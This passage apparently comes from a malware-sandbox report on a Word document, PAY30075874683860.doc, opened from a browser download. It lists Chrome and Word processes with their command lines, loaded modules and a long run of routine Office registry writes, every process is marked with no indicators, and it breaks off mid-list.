"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=87724A4684B6062780D52DBFAEFB6C89 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=87724A4684B6062780D52DBFAEFB6C89 --renderer-client-id=8 --mojo-platform-channel-handle=3952 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2708
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=6FE2C11E5C9D36B0E72A860EAD454E2D --mojo-platform-channel-handle=3980 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3716
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\PAY30075874683860.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\psapi.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll

PID
2964
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\version.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\sxs.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winspool.drv
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\msxml6.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll

PID
2060
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=F114DEE4908F3A916D2510DA5DEE4767 --mojo-platform-channel-handle=4420 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

Registry activity

Total events
2977
Read events
2456
Write events
517
Delete events
4

Modification events

PID
Process
Operation
Key
Name
Value
3332
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
..&
2E2E2600040D0000010000000000000000000000
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831838
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831952
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831953
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
040D0000BA7A76238ADAD40100000000
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
%/&
252F2600040D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
+1&
2B312600040D000006000000010000008200000002000000720000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0030006200730034002D006C0031006300350078002D007900700067007A00780071006B002E0064006F006300000000000000
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1315831812
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{B09E70ED-2ADF-488B-913E-E1F3E98C855D}
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\198AA3
198AA3
04000000040D00003800000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0030006200730034002D006C0031006300350078002D007900700067007A00780071006B002E0064006F0063001600000030006200730034002D006C0031006300350078002D007900700067007A00780071006B002E0064006F006300000000000100000000000000F88E6A238ADAD401A38A1900A38A190000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831849
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831850
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831849
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831850
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831870
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831871
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831851
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831852
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831851
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831852
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831872
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831873
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831874
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831875
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831876
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831877
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3332
